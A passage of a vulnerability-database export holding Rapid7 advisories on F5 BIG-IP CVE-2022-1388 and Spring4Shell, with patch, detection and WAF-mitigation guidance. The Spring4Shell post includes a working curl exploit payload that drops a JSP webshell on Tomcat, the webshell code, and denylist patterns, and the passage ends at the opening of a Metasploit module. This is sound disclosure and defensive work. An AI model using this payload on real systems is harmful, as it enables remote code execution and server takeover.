"2022-07-28T14:00:00", "id": "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "href": "https://blog.rapid7.com/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, "class._", "Class._", "_.class._", and "_.Class._". These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class._", "Class._", "_.class._", "_.Class._"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-10T15:36:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "packetstorm", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "PACKETSTORM:167011", "href": "https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking # It's going to manipulate the Class Loader \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Framework Class property RCE (Spring4Shell)', \n'Description' => %q{ \nSpring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 